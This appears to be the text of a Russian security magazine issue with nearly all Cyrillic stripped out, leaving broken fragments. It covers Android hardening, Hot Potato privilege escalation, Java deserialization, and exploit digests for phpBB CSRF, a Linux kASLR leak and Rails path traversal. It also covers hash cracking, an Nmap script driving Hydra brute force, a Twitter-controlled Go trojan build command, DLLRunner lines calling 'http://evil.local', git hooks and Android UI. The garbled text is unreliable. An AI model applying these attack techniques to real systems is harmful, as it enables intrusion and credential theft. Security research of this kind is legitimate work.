, , ,
.
APK. 250/300 . Omate

Android 5.1 .
Android

,
ANDROID
Android , :
Textpresso,
Zipwhip. ,
.
Satis Smart Toilet Bluetooth,
Android-. ( PIN 0000), .

,
. ?
, SoC
. , , WWW
- . , ,
,
IoT
, (
SoC , , , . . .). ,
/ ( , ).
, , .
, , , (
),
;
EoL .
, Android ( )
. ,
, , , . , , Android
. .

MOBILE:


BLACKBERRY PRIV

androidstreet.net

Android
,
. , ,
.
, .
? .

,
Android . GATCA: Elite, .
BlackBerry Priv, -.
Android BlackBerry .
,
, , Android .
, ( -
):
(
Root of Trust, UEFI Secure boot);
ASLR, ;
SELinux;
Pathtrust, ,
;
Linux Android ,
DTEK,
;
FIPS 140-2
, brute-force-;
- Enterprise-, -.
, ? ,
Android .
, BlackBerry
.

BlackBerry . Root of Trust
, , .
,
, SHA- /system
. .
Root of Trust

, Root of Trust , , ,
, . ,
, root
,
.
, .
: , ,
root. , , root,
, , -
.
: BlackBerry . ? ? ,
root? , Root of Trust , ?
,
.
, , , Xposed .
- BlackBerry Priv 2 .
.
, , (
Apple iPhone 4S, ). ,
BlackBerry .
ASLR
ASLR (Address space layout randomization)
, , PaX ( Linux) 2001 . , ,
, -
( ) .
ASLR ( , ),
, , , , - , , libc
( ).
ASLR , Android : 4.1, ( )
. , - Android,
(
zygote copy-on-write), ASLR ,
( ).
. ,
, CopperheadOS, ( 3 15 ).
BlackBerry Priv? , , - .
SELINUX
SELinux (Security Enhanched Linux) security- , .
( ,
). , SELinux ,
(, ) .
Android SELinux 4.2
, C C++
( , ).
(, ) Android
: , ( ) . SELinux
.
, , SELinux
. ,
.
,
( ,
). BlackBerry? .
PATHTRUST
Pathtrust QNX 6.6,
BlackBerry. , .
. -,
, Android .
,
, UNIX- (/system/bin ),
(
, SELinux). , , , , Linux, Android- , , .
- APK (
, ).
DTEK
DTEK BlackBerry,
. , : ,
, , , ,
.
.
, , : USB
, ,
- . , Google : BlackBerry Priv
,
, Google, , , . ,
.
( ) . , (, ) ,
. ?
. ,
Android 4.3 CyanogenMod 10.1 (, , BlackBerry). CyanogenMod
, BlackBerry : .
, Android 6.0,
, (Target
SDK: 23).

DTEK

,
FIPS 140-2
FIPS 140-2 , ( , ). ,
, ( ),
, (
). CMVP (Cryptographic Module Validation Program)
FIPS 140-2,
.
, ,
BlackBerry Priv
. ,
140-2 .
Linux, OpenSSH, OpenSSL. BlackBerry Priv FIPS 140-2 , , ,
AES, Android.
, , FIPS 140-2 2002 .

, BlackBerry, ,
Enterprise-, , . , GATCA: Elite, , ,
,
Android (256- , ,
) ( SIM-).
.

MOBILE

#16.

:


,


,
,
,


. .

Text Aide
: Android 4.0+
:
TEXT AIDE
, ,
,
? ,
,
. Text Aide
,

.
:
,

, . :
, Define. : .
,


.
. Text Aide , ( Speak
) .
. , , Expand
.
,
@, Text Aide . Dict Aide, Text Aide
.

Pintasking
: Android 4.1+
: / 217 .
PINTASKING

, , , Pintasking
. Pintasking : ,
, Tap to pin, , ( ,
) . , , .
Pintasking ,
, , pin
,
.
, Pintasking , ,
. .

Focus Notify
: Android 4.2+
:
FOCUS NOTIFY
TODO-, Google Keep Evernote
. Focus Notify . ,
TODO-
Material.
,
. ,
.
,
,
.

Textpand
: Android 5.0
:
TEXTPAND

Text Aide,

, .
,
.
-, , ,
, ,
, , .
,

Google Drive. Textpand
, .
.

EASY
HACK

GreenDog , Digital Security


agrrrdog@gmail.com,,twitter.com/antyurin

WARNING

.
, ,
.

WINDOWS
HOT POTATO
,
Windows SYSTEM. Windows, ,
. Hot Potato.
, ,
Easy Hack.
, ,
.
Google.
, , , Windows , NTLM ( ). -
SMB, HTTP NTLM, . -

SMBRelay. Microsoft ,
relay , .
Google proof of concept, , WebDAV NTLM-,
SMB .
.
PoC . -, ,
WebDAV. -,
Microsoft , .
Foxglove Security .
.
, Windows ,
.
WPAD , -.
, Windows Update.
, ( ).
WPAD- PoC
WebDAV- , Windows.
, WPAD . NBNS spoofing.
-, NBNS spoofing . Windows
WPAD, DNS-, , DNS,
, NBNS (NetBIOS
Name Service). UDP NBNS. ?
, ,
.
. NBNS
TXID. - , ,
. 2 , 65 536
. NBNS-
TXID. ( lookback-),
.
.
NBNS- WPAD- ( -), - .
, . - ,
, NTLM-.
SMB RCE SYSTEM.
Hot Potato :
- ? . - ( ). .
. -,
, WPAD DNS-, NBNS WPAD.
UDP- , DNS- ,
. DNS-
, NBNS.
-, Foxglove , TXID
NBNS- . , NBNS- . ,
WPAD - .

JAVA-
SUPERSERIAL
Java- Easy
Hack, ,
. ,
,
bug bounty. !
, Easy Hack
, Java.
:
, .
. -, ,
, . -, ,
.
, . ( )
( ).
, , .

Burp Suite SuperSerial. , .

, Base64.
,
( ). :
, Java-,
.
SuperSerial SuperSerial-Active.
Burp, Java-. (
ysoserial) URL.
-. Out of band (OOB).
, URL
. , , .
-, DNS-, ,
DNS- .

RCE SAML XSLT


XSLT, , . XSL-
XML. XSLT ,
XSL, .
, XML-, XSL-, . .
, XSL- XML. -, , . namespace: xmlns:xsl=http://www.w3.org/1999/XSL/Transform.
, XSLT- XML
c XXE. XSLT ( XML-) .
, XSL XML,
SVG,
XML- XML Digital Signature.
XML DSig XML-.
XSLT- , . , . ,
( , ),
XSL- . Transform ( Transforms).
.

XML- c

, ,
XSLT-. - , XML DSig,
, - .
,
. , , .
, .
, XML DSig ,
Security Assertion Markup Language (SAML).
XML, . ,
. , .
? SAML,
XML DSig, , , XSLT-.
RCE. ! ,
: ,
XML DSig .

,
Digital Security
b.ryutin@tzor.ru
@dukebarman
dukebarman.pro

WARNING

.
,
,

.

CSRF-
phpBB,
. kASLR ,
Ruby on Rails.

CSRF- PHPBB
CVSSv2:
N/A
: 25 2016
:
Lander Brandt
CVE:
N/A

BBCode. BBCode , , HTML
JavaScript .
./phpbb/
phpBB/posting.php, , . , , , HTML. .

, . request_
var(). \phpbb\request\request_
interface::variable(),
. $_GET $_POST. trim() .
, , POST,
, , GET.
CSRF-.
, CSRF- phpBB. .

check_form_key() , CSRF,
, , . .

, CSRF .
.
add_form_key() check_
form_key(). , add_form_key()
check_form_key().
.

add_form_
key() check_form_
key()

check_form_key(), add_form_key(),
, .
, , .
: acp_bbcode.php acp_extensions.php.
acp_extensions.php ,
phpBB . CSRF- , , . .
(acp_bbcode.php) ,
POST-, request_var() . , CSRF-, BBCode
GET-.
XSS,
. phpBB , , ID .
SID cookie, .
-,
.

, IP,
.
.
XSS, SID document.location.
EXPLOIT
XSS
CSRF
phpBB

, , .
TARGETS

phpBB < 3.1.7-PL1.


SOLUTION

LINUX,
KASLR
CVSSv2:
N/A
: 24 2016
:
Marco Grassi
CVE:
N/A
ASLR (Address Space Layout
Randomization) .
kASLR , (k kernel). kASLR
, . .
/proc
Android, WCHAN. (wait
channel), , . ps -l.
wchan ,
/proc/pid_of_interest/stat. . , ? ?
.

18446744071579755915 , ,
, hex :
>>> hex(18446744071579755915)
'0xffffffff810de58bL'

Ubuntu 14.04, , kASLR


,
.
EXPLOIT

. , /proc/pid/stat , :
1. .
2. WCHAN ASLR.
3. .
4. .

: , /proc/sleeping-pid/stat, , ,
.
, , , kASLR, .
Python.

.
marco@marco-l:~/Documents$ python infoleak.py
Leaking kernel pointers...
leak: 0xffffffffb70de58b 18446744072485725579
kASLR slide: 0x36000000

kASLR,
.
TARGETS

kASLR .
SOLUTION


RUBY ON RAILS
CVSSv2:
N/A
: 25 2016
:
John Poulin
CVE:
CVE-2016-0752
Ruby on Rails, . ( ,
render params:id(), .
RoR ,
. ,
show show.html.erb, .
, ,
, ,
HTML, JSON, XML .
(ERB, HAML ). , , . . Rails ,
file:.
.

, ,
template. ,
. - ?
?
. ,
. - .
, , app/views/
user/#{params[:template]}. ,
dashboard,
app/views/user/dashboard.{ext}, ext
: .html, .haml, .html.erb .

dashboard

,
../admin/dashboard?

../admin/
dashboard

,
, RAILS_ROOT/app/views, RAILS_
ROOT . , , /etc/passwd, .

/etc/passwd

, , ,
? , config/initializers/
secrettoken.rb.

config/initializers/secrettoken.rb_ file

,
. , .
EXPLOIT

The Anatomy of a Rails


Vulnerability CVE-2014-0130: From Directory Traversal to Shell Rails, .
, .
LFI, .
, (ERB). ( , CSV).

, Ruby- -.
, . Ruby on Rails , , , ( ,
development.log).
,
URL- .

.

development.log

development.log.

ls


ls.
Metasploit, .

CVE-2016-0752

.
,
RoR.
TARGETS

Ruby on Rails 25 2016 .


SOLUTION

InsidePro Software
www.insidepro.com

,
( ). , ? ,
? ,
,
?
?
, ( . hash cracking),
, , , . ,

.
. , .
( ) .
, ,
, IP-, . ,
, ,
. ,
, .
.
, , . , , . ,
. ?
? , ,
? .
. 1.

(GPU).
(CPU) , GPU. GPU oclHashcat, Windows,
Linux,
NVIDIA, AMD. Open
Source, GitHub, .

hashtopus. GPU-
John the Ripper (JtR) Jumbo, ,
-
.
CPU , hashcat JtR.
Hash Manager, , ,
. , ,
, , ,

.
, , GUI , , (. ). (BAT CMD),
.
, , , .

. ,
,
(. . 2).
. 2.

, ,
, , .
( )
AMD, /. sm_50 (Maxwell) NVIDIA ,
, , . NVIDIA GTX 980Ti (. . 3).
InsidePro ( )
165 MD5 15
. , , . , , AMD
. , c 12001300 .
. 3. GTX 980Ti

CPU, , , . GPU,
CPU , , GPU
. (SSE AVX )
,
, , .
-, CPU GPU
? , .
( )
CPU , .
GPU

, ,
CPU ,
RAM.
, CPU GPU,
Intel Xeon Phi. , , , ,
, .
, 60
( ), 240 . bcrypt (
) , john-users bcrypt. , ,
.
, FPGA (),
? , , SHA-256,
(
SCRYPT ). , ( ) ,
.
. , , MD5, . Altera, Xilinx
,
.

,
. ? ,
.
1.  ( wordlist).
,
, .
.
2.  () InsidePro HashKiller
, , :. , . ,

.
3.  , , . , . ,
, .
,
, ,
,
,
.
, , ,
.

,
, ?
- cmd5.ru.
hashchecker.de, , , , .
. , , Hash Finder.
500 -
- ,
, .
( ) , .
:
forum.insidepro.com;
forum.hashkiller.co.uk;
forum.antichat.ru/forums/76.
,
.
, , .


. , ,
. .
, .

:
 ,
, ;
, , , ;
 ,
, ,
.
, . - -
(, grep), - Perl, - . , , : , ,
, , .
, . hashcat , JtR , Windows
Hash Manager. 70 ,
= . , , ,
BAT-, .
64- .
BAT-, , , , Magento :
REM 35
ExtractLinesByLen.exe %1 35 35
REM 2.txt
MOVE /Y %1.Lines 2.txt
REM
IsCharset.exe 2.txt ?h 1
REM
IsCharsetInPos.exe 2.txt 33 ':'
IsCharsetInPos.exe 2.txt 34 ?l?u?d
IsCharsetInPos.exe 2.txt 35 ?l?u?d
REM ! 2.txt Magento

Hash Manager, Bonus, 30


, .

, . ,
, ,
CMS
, IPB 4
bcrypt. , -
PBKDF2 bcrypt,
.
, .
- MD5, SHA-1, SHA-256 SHA-512
.
GPU- CPU-.
. - (. ), ,
. ,
CMS, . . ,
, ,
.
, - , , 123456.
(, ), , . ,
-, , ,
, email. . , Hash Manager, Bonus\
SearchAlgorithm BAT-
( 400),
Unicode, ( ) .
, , . - ?

?
, . , ,
. . ,
. ,
. ,
, . , .
, .
, ,
.
: , ,
. .


,
. , ?

, . ,
,
, ( ) -. ?
,
Linux- crypt() sha512crypt bcrypt.
,
( ). ,
, .
, ( , 200500 ) PHP- md5. (, ,
vBulletin osCommerce), PHP-,
, . ,
, (
, GPU ).
MD5 50
100 . ,
( , , PHP-).
.
(, SHA256 SHA-512) 32 ( ). , , , MD5 ( ),
, .
, , CMS, CMS
, (-) , CMS
. .
: ,
, , .
!


, , . ,
, ? .
? , . .
Hash Manager, Top100xx.dic. ,
,
. .
, , , .


? , ! Crack Me If
You Can, KoreLogic DEF
CON, Hash Runner Positive Hack Days.

( , 48 ) , .
, . ,
InsidePro, hashcat john-users, . , .
,
, - . ,
( )
, .
, , .
. 4.

DEF
CON 2012

, .
, . , ,
, , , , .


, . ,
,
: ,
. ?
.
, ,
Windows FAR Manager.
.
(, Hash Manager), , .
( F2)
, ,
.
, F2 .
FAR
, , , .


,
, .
,
,
-, , ,
!

THERE IS NO 100%
GUARANTEE

@ygoltsev

(penetration testing)

. - , - , -
. , ,
, .

INTRO
- , ,
,
, - , . (FUD! Deal with it!).
, .
, .

. , .
.
.
. ,
, .

2016 :
, ,
. , ,
.
2013 . Affinity Gaming,
, .
Trustwave, , , .
Trustwave, ,
, , , ,
.
Trustwave , . , ( , ).
, , ( , , ).
. , ( Affinity), .
2014 Affinity Gaming
Ernst & Young. E&Y
, , , Framepkg.exe. :
Trustwave, .
, : ,
. PRELIMINARY STATEMENT
, , Trustwave . Trustwave.
IT-security Mandiant.
, Trustwave , ,
. Trustwave
, .
, .
, Affinity , ,
. Trustwave ,
2015 Affinity Gaming .
, , . , Trustwave : . , -
, , , .
PIECE FROM MY REALITY
. . ,
.
, . , .
, - . ,
. .
, ,
,
. . pwnage , . ,
,
, .
, ,
.
. , . , ,
, .
. , ,
- .
, ,
.

pwnage. , , , . , , , - sqlmap .
, . , pwnage , ,
, . , ,
,
.
, RCE.
. . ,
.
, . , ,
, . , ,
, .
. , .

- Trustwave
, , . (
), ,
. .
, , . , . ,
: .
,

. , , , , .
. ( ), ,
. ,
.
. ,
. ,
, -. ,
, , offensive-,
defensive-.
OUTRO
Trustwave . -
-
. ,
- -. , , . Stay tuned!



Vulnerability Assessment
Open Source Security Testing Methodology Manual
The Penetration Testing Execution Standard

PentesterLab
Penetration Testing Practice Lab

Open Penetration Testing Bookmarks Collection
Right way to contribute
DC7499
DC7812
2600 russian group

NMAP


lely797@yandex.ru

NSE-

Nmap , , , , . Nmap
. , Nmap .
, . Nmap
, .
NMAP
, , Nmap,
. , , :
Nmap - , , . ,
NSE;
NSE (Nmap Scripting Engine) Nmap,
, :
Nmap, . NSE Lua;
Lua , JavaScript.
. 1. Nmap


, Nmap . /
.

. , Nmap, , . , :
.
, THC-Hydra (, HTTP-Basic, SSH, MySQL). , .
, ?.. ?
, Hydra /
(, PostgreSQL). :
Nmap;
THC-Hydra;
.
Nmap / Hydra, :
$ sudo apt-get install nmap hydra

, . Nmap
*.nse. . Vim:
$ vim hydra.nse

NSE-
, ,
. ,
, (
), , ,
, , , . .
(DESCRIPTION)
, ,
, .
, / PostgeSQL,
:

:
-- ;
--[[ ]] ;
@usage, @output, @args ,
, .
@usage .
(hydra). ,
/<path to nmap>/nmap/scripts/,
. . --script-args "<some arguments>".
(lpath)
(ppath). : login.txt password.txt .
, (CATEGORIES)
NSE- ( ). , Nmap
, , .
:
auth , ;
brute ,
;
default , .
, :
, , , , ;
malware , .
, auth, :
$ nmap --script=auth example.com

. brute.
:

(AUTHOR)
. :

(LICENSE)
Nmap ,
NSE-.
. Nmap :

.
(DEPENDENCIES)
NSE-, . ,

,
dependencies .
(HOST & PORT)
Nmap , .
:
prerule()
, ;
hostrule(host) , ;
portrule(host, port) , ;
postrule()
. ,
.
. (5432) (postgresql), . shortport, NSE,
. port_or_service (ports, services,
protos, states), ports , services ,
protos (, udp), states .
true , , ports - services, , , false.
PostgreSQL, :


,
, .
, ,
. Lua :
local <_>. . Lua
require. :

:
nmap NSE,
Nmap;
shortport NSE, ,
, ;
stdnse NSE, NSE-;
string Lua, ;
table Lua ( );
tab NSE Nmap .
, .

NMAP LIBS
Libraries.

(ACTION)
. action , . ,
, ,
, Nmap.
action- :

action-:

Nmap , , , . Nmap postgresql, Hydra


postgres.
, :

( task).
, ( ), (
):

.
, , :

:
-L (-l) <__> (<_>)
-P (-p) <__> (<_>)
t <_> ( 16)
-e ns : n , s

-s <_>
IP ( )
. , .. Lua
.

HYDRA
THC-Hydra .

, str. io.popen(str). str


(handler), .

s ( . 2).

. 2. Hydra

, - login:password,
regex. string match,
login password
, .

, ([^%s]*),
(%s ). ,
:

( if (port.state
== "open") then end ). , . , , Nmap.

, Lua #
. # .
action- ( end).

LUA DOCS
Lua .

/<path_to_nmap>/nmap/scripts/.
. , PostgreSQL.
POSTGRESQL
1. . PostgreSQL .
:

$ sudo apt-get install postgresql

$ sudo service postgresql status

$ sudo service postgresql start

$ sudo su
$ adduser postgresql ( , qwerty)
$ exit

2.
 Linux-. postgresql:qwerty. :

3. postgresql:

$ su - postgres

$ psql template1

template1=# CREATE USER postgresql WITH PASSWORD 'qwerty';

template1=# CREATE DATABASE test_db;

template1=# GRANT ALL PRIVILEGES ON DATABASE test_db
to postgresql;

template1=# \q

.

login.txt postgresql
password.txt qwerty:
. 3.

:
$ nmap --script=hydra localhost

, . 4.
. 4.
Nmap

,
login.
txt password.txt . ,
lpath (
) ppath ( ).
:
$ nmap --script=hydra --script-args "lpath=<path_to_file_with_logins>,

ppath=<path_to_file_with_passwords>" localhost

. action-,
lpath ppath
:

. , (
path_login path_password):

, .

? Nmap Hydra.
, .
. . portrule :


. ,
. (, / ).

HYDRA.NSE
, ,
GitHub.


(,
). Nmap
-d (. . 5). ,
:
$ nmap --script hydra localhost -d

Nmap .
, , (print).
. 5.

NSE Nmap. , -
. .

D1g1 ,
Digital Security
@evdokimovds

WARNING
!


! ,


!

INSIDEPRO HASH VERIFIER


Hash Verifier ( ) .

:
InsidePro
URL:
verifier.insidepro.com
:

:
;
30 , ;
(
1000 );
;
;
(: ::).
,
, , .
, , ,
.
,

.

INSIDEPRO HASH FINDER


Hash Finder
.

:
InsidePro
URL:
finder.insidepro.com
:

:
;
100 , ;
( 100 000
);
(
);
;
.
:
1.
( 500 ), ,
.

.
2. ,
.
,
,

.

INSIDEPRO HASH MANAGER


Hash Manager
.

:
InsidePro Software
URL:
www.insidepro.com/
download/HM.zip
:
Win

:
Ahmed Aboul-Ela
URL:
github.com/aboul3la/
Sublist3r
:
Linux

:
( );
400 ;
70
, ( , ,
, SQL,
);
64- , ;
, ,
;

;
;
Unicode;
.


Sublist3r Python, - .
( ) -
. Sublist3r
:
Google;
Yahoo;
Bing;
Baidu;
Ask.
,
. , , , .
, Netcraft DNSdumpster. , Sublist3r
subbrute TheRook,
, .
:
Requests;
dnspython;
argparse.


example.com:
$ python sublist3r.py -v -d example.com

, ,
.

:
nottinghamprisateam
:
Peter Cunha
URL:
github.com/petercunha/GoAT
:
Windows

:
Saif El-Sherei Etienne
Stalmans
URL:
github.com/sensepost/wadi
:
Windows 10

:
Florian Roth
URL:
github.com/neo23x0/
dllrunner
:
Windows

GOLANG ADVANCED TROJAN


GoAT , Go Twitter C&C-.
GoBot SaturnsVoid. GoAT
,
-
.

go build -o GoAT.exe -ldflags



"-H windowsgui" "C:\GoAT.go"

, -
- .

. Go
PowerShell. . ,
Trojan.Encriyoko.

WADI FUZZING
,
.
Wadi Python Edge Microsoft Windows.
: WinAppDbg
Twisted -. Edge
MicrosoftEdgeCP.exe, RuntimeBroker.
exe MicrosoftEdge.exe . -
- Googles PyV8 .
,

. ,
-
Wadi,
.
DEFCON 23 -. Wadi
Fuzzer.

DLL -
DLLRunner DLL

. DLL-
rundll32.exe file.dll,
PE- ,
, - . , , , :
rundll32.exe path/to/file.dll,exportedfunc1 "0"
rundll32.exe path/to/file.dll,exportedfunc1 "1"
rundll32.exe path/to/file.dll,exportedfunc1
"http://evil.local"
rundll32.exe path/to/file.dll,exportedfunc1
"Install"
...

,
,
, .
.

MALWARE:

POWER OF
COMMUNITY 2015:


defec.ru, twitter.com/difezza

Power of Community
,
2006
. ,
,
.


,
CTF,
. ,
, , ,
scoreboard .

, PoC

The Grugq
APT
clicking-clicking war


CLICKING WAR
. , -
PoC, ,
. -- :
. : .
, ,
The Grugq.
, , 0day. The Grugq APT, clickingclicking wars ,
, .
(Wenyuan Xu),
(Zhejiang University), ,
,
, . , - :
;
;
;
;
.
(Wi-Fi, NFC, ,
GPS, ).
,

(device fingerprinting).
, ,
, .
-
.
, .

,
: ,
( , ,
).
. ,
, , . , .

, , . - , , - .


: ,
, , .
- , ,
.

,
, .
, ,
, , GPS-,
. , , ,
,
.

,
, ,
. .

:


. :
, ,
.
,
.

Opppa... Gangnam style

MALWARE

84ckf1r3
84ckf1r3@gmail.com


.
Kaspersky Free.

, -? ? .

. VirtualBox Windows 7 - .
.
- (TCPView, Autoruns VirusTotal
API, ProcessExplorer, Regshot, AVZ ).
Clean MX, / .
, .
IE (
). - .
KASPERSKY FREE
16.0.1.445 147,8 . Kaspersky Free 232 . , ,
, , . KIS KTS.
Kaspersky
Free

.
, . ,
.
Google Play Kaspersky Internet Security, Kaspersky
Protection Toolbar. . .

Kaspersky Free

Kaspersky Free .
Microsoft SmartScreen,
. .

Kaspersky Free MS SmartScreen


. ,
Kaspersky Free . , 17 - VirusTotal.

Kaspersky Free ,

Kaspersky VirusTotal Downloader.Win32.Bundl.


aq, .
, , .
AVIRA FREE ANTIVIRUS 2016
Avira Free
. Avira -. , .
, .
Avira

Avira 1329 , \Program Files\Avira\. \ProgramData\Avira . Avira Free


( ), .
.
-. -, . ,
.
Avira Free

Downloader.Win32.Bundl.aq .
, Avira. .

Avira

js-, Avira . .

Avira

Remove
. Avira
, .
ZIP Avira
.

Avira ZIP

Avira , PUA (
).

Avira PUA

, , Avira
, . .

Avira -

Kaspersky Free, Avira SmartScreen.

Avira MSS

AVG ANTIVIRUS FREE EDITION


AVG . . AVG Free
192, ,
. ,
. , , AVG Free, ?
AVG Free

,
. 30- .
AVG Free .
AVG

AVG Free AVG SafeGuard by Ask Ask ,


AVG Android.
, Kaspersky Free,
AVG .
.

AVG

AVG
.

AVG

ZIP AVG
.

AVG

- js-, . AVG ,
, SmartScreen... .
. AVG

. .
.
AVG

-,
VirusTotal, AVG . , .

AVG

MALWARE

AVAST! FREE ANTIVIRUS (11.1.2245)


Avast! : Google Chrome Google Toolbar IE. 604 ,
Avira Free.
. . ,
. ,
Avast.
MSS Avast! .
() .
Avast!
,

js- Avast! , - .

.

Avast! JS

Avast! ,
.

Avast!

, VirusTotal 34 , Avast! . , MSS.


Avast!


Microsoft, 10,
. , ? , Avira :
DANGER
, ,
,
,
( ) -

(, ID ,
.
IP- , , , ,
, IMEI- , ,
, , , SIM, ,
.
,
GPS/Wi-Fi/ ... , , : , , , email,
, , , ( )
INFO
,
.
, .
.


, . ,
, .
.
,
,

,
.

,
,
, , :

, ...
,
.

.
, .
,

, .
Kaspersky Free
, .
.
Kaspersky
Security Network, KSN . ,
, , ,
. .

KSN

, -. ,
.
, .
,
.

, .
Kaspersky Free . KIS, ,
KSN.
Avira . , . .
,
.
Avast! ( ) .
, ,
, .

.
AVG ,
. ,

.

WWW
Kaspersky Free
Avira Free Antivirus 2016
AVG AntiVirus FREE
Avast! Free Antivirus

WARNING

.
.



.

.

GIT HOOK

code review printf, console.log?



?
( Bitbucket),

? !
Git Bash!

,
Pushwoosh, Inc.
nikita.arykov@gmail.com

git push --force

GIT HOOKS
-callback, Git, .
Observer .
commit, apply patch, merge, push,
rebase Git. ,
commit message,
/ .
Git,
Subversion, Mercurial, Bazaar.

:
 (developer,
lieutenant, dictator).

, .
,
$PROJECT_DIR/.git/hooks/.
.
, git commit --noverify.

 , :).
.

$PROJECT_DIR/hooks/, . . , .
Git hooks : Python, PHP, Ruby,
PowerShell . Bash.
Hook , , 0,
(git commit, git push ) .

git init , .
$ captain@jolly-roger:/PONY/.git/hooks$ ls
applypatch-msg.sample post-update.sample pre-commit.sample
pre-rebase.sample
update.sample
commit-msg.sample
pre-applypatch.sample pre-push.sample
prepare-commit-msg.sample

, , .sample
(cp pre-commit.sample pre-commit), ,
; chmod +x pre-commit.
,
.
.

INFO
hooks

Git

man githooks.

push
pre-receive, ,
, git push. , 0,
.
, (),
master-,
.
, pre-receive hook black-list:

. changedBranch , .
blockedUsers,
1 blessed repository.
white-list,
(Release managers)
master-. branch permissions Bitbucket
Server .
Branch
permissions

Bitbucket Server

INFO

printf shall not pass


- , Print debugging (, -, Tracing)
. blessed repository,
Git hook ( pre-commit,
pre-receive):

master-

. branching
workflow,
gitflow GitHub
flow, ,
master-

.

git diff --cached --name-only , ,


[[ -f $FILE ]], ,
. . ,

, . code review
:
$ git commit -m "fix critical bug"

debug.js contains denied word: console.info("hm,

is this dead code?");

debug.php contains denied word: var_dump($a);

Aborting commit due to denied words

.
JetBrains, , hook .

hook IntelliJ IDEA

commit message
, commit message issue
trackera, JIRA. commit-msg, , .
-m
git commit -m "commit message".
PONY.
:

. GitLab
commit message.

INFO

,
JIRA.

,

code review
.

commit message GitLab


, , unit-, , . , . PHP, Ruby, Go,
.

, . staging area . t.php :

t.rb :

Git hook
:
$ git commit -m "magic commit message"

PHP Parse error: parse error in t.php on line 4

Errors parsing t.php

t.rb:1: unterminated string meets end of file

Aborting commit due to files with syntax errors

,
.
Jenkins-
, continuous integration, .
, Jenkins, , . https://jenkins-ci.org/ https://jenkinsci.org/ Git plugin Jenkins,

curl https://jenkins.your_company.com/git/notifyCommit?url=
https://repository.your_company.com/PROJECT

hook post-receive,
, . Build Token Root Plugin,
.

, $GIT_DIR/hooks pre-commit
pre-receive hook.
#!/bin/bash
"$(dirname "$0")"/check-syntax
"$(dirname "$0")"/block-debugging-code
"$(dirname "$0")"/unit-tests

. , - , .
,
?

, . , GitHub

ssh .
. , Puppet, hooks , Grunt.

Git hooks , . :

, ,
php codesniffer, gofmt, pep8 . code review
- .
- ? lolcommits GitHub.
.
 - , , GNU Aspell
.

!


ANDROID



zobnin@gmail.com

, Tasker Locale,
Android iOS. , ,
root, , ,
Linux- . iOS
? Binder IPC/RPC-, Android.

Android, , ,
. , Android-: ) ( ) SD-
, )
( Android 6.0 ) ) , .

( Android
Linux),

( ART,
).
,
: ,
, ,
?
Binder, BeOS, Android.
Binder COM Windows, .
Android Binder,

, . Binder
, ,
. Binder
, , , , ,
. , ,
Binder.
, , ,
- Binder, ,
Android (,
/dev/binder). , , Binder.

Android Intent Binder
, , , , . :


Binder

. SecondActivity, OnCreate(), :
, . ,
, OnCreate() SecondActivity .
, , . ,
. :

, . : ,
(SeconActivity), , (com.my.app.
MY_ACTION), ... - , , .

. , , ,
.
, ,
:

( android.permission.CALL_PHONE), , Phone Intent.ACTION_CALL (


, , intent-filter). ,
,
, ,
( , ).
, , Intent.ACTION_VIEW
-, , ACTION_SEND
( ), ACTION_SEARCH .

, . ,
, android.intent.action.MAIN.
intent-filter MainActivity .
, , , .
, Binder, .

,
, ,
, - . Android .
- : ,
, , , , .
.
,
, ,
, (, , ).
.
.
.
, , ,
,
. ,
, .
, , , -.
, , . , CONNECTIVITY_CHANGE, ,
: .
, . ,
intent-filter:

filters/ConnChangeReceiver.java:

NetTools isConnected():

, : CONNECTIVITY_CHANGE , , , , .
, 8.8.8.8
( , ),
, ,
,
, , , ,
, . !
:

, , intent-filter android.intent.action.BOOT_COMPLETED.
, , .

][
,
. , ( android.intent.action.ACTION_SCREEN_ON),
(NEW_OUTGOING_CALL PHONE_STATE),
, .
.
.
:

, , ,
,
getAction() ( NEW_
OUTGOING_CALL, PHONE_STATE, ), getStringExtra(). , ,
, ,
TelephonyManager , .
, , ,
, , , IRC,
Telegram.

, Tasker. , ,
(
Android). , ,
, , ,
.
Google Now, , , , Binder ACTION_SEND.

, ,
,
, ,
.

MATERIAL DESIGN
ANDROID

.
,
!


mail@s-melnikov.net,
www.s-melnikov.net

Android- 5 6
,
Material Design. ,
Google, ,
,
. ,
Android ,
. Android 6, , , .

Material Design Android
Google,
Google I/O 2014 .
,
( ) .
, . Google,
,

(. 1).
,
, (. 2).
(Floating Action Button),

. ,
Gmail .
, - . 1. Material Design
(,
) .
, , , ListView FAB
.

. 2. ? !

Material Design
( :).
. .), Lollipop .
. , Ripple- ( ), . , , .
Material Design ( !) Google, .
ANDROID APPCOMPAT VS. DESIGN SUPPORT LIBRARY
Android 5 SDK Google AppCompat ( ActionBarCompat),
aka v7. Material Design
2.1 (API Level 7). Toolbar,
ActionBar , ( , , ).
, Material- :
EditText, Spinner, CheckBox, RadioButton, Switch, CheckedTextView.
, RecyclerView ( ListView), CardView () Palette ( ).
,
, .
, , , , , , Gmail Android 4, ,
AppCompat . -
AppCompat
Material Design.
, Google , , , -
AppCompat, Design Support Library. -: (Navigation View), (Floating Action Button), (Snackbar), Toolbar .

.
,
, .
, SDK, Android Studio ...

Android Studio,
dependencies build.gradle :


23.1.1, . , IDE
, ,
.
COORDINATORLAYOUT, TOOLBAR --
CoordinatorLayout,
() , ( ,
CoordinatorLayout FrameLayout). ,
. 3 .
, (), (. 4). , , , .

. 3.

. 4.

( ,
):

, CoordinatorLayout : AppBarLayout FrameLayout. : , RecyclerView ListView.


. 3 RecyclerView (FAB).
AppBarLayout FrameLayout , ,
layout_behavior="@string/appbar_scrolling_view_behavior",
AppBarLayout.
AppBarLayout -
LinearLayout, - ( ) . CollapsingToolbarLayout,
Toolbar. , CollapsingToolbarLayout AppBarLayout. AppBarLayout
layout_height,
192dp.
layout_scrollFlags . scroll, AppBarLayout ,
( ). , exitUntilCollapsed, ,
Toolbar . ,
, , ( ) .
, ...
contentScrim="?attr/colorPrimary" , CollapsingToolbarLayout.
, . 4 Toolbar - , .
, @android:color/transparent.
, ,
(), Toolbar (, , ) ImageView ()
CollapsingToolbarLayout. layout_collapseMode="parallax"
ImageView Toolbara. ,
.
, ,
, . , :

, , ! SetSupportActionBar ActionBar
Toolbar . , setTitle. Toolbar
Android Developers.
ImageView
Picasso .
Google, . Android ? setImageResource
Out of Memory ? ,
, , . , , BitmapFactory, ,
, , , Picasso,
UniversalImageLoader. , ...
SNACKBAR
Snackbar ,
(. 5). ,
( Action), (,
). - Snackbar
( - . 5. Snackbar
Toast).
:

, CoordinatorLayout,
Snackbar (. 6).
, FAB Snackbar .
CoordinatorLayout, (. 7).

. 6. CoordinatorLayout

. 7. CoordinatorLayout

EDITTEXT FLOATING LABELS


Material Design
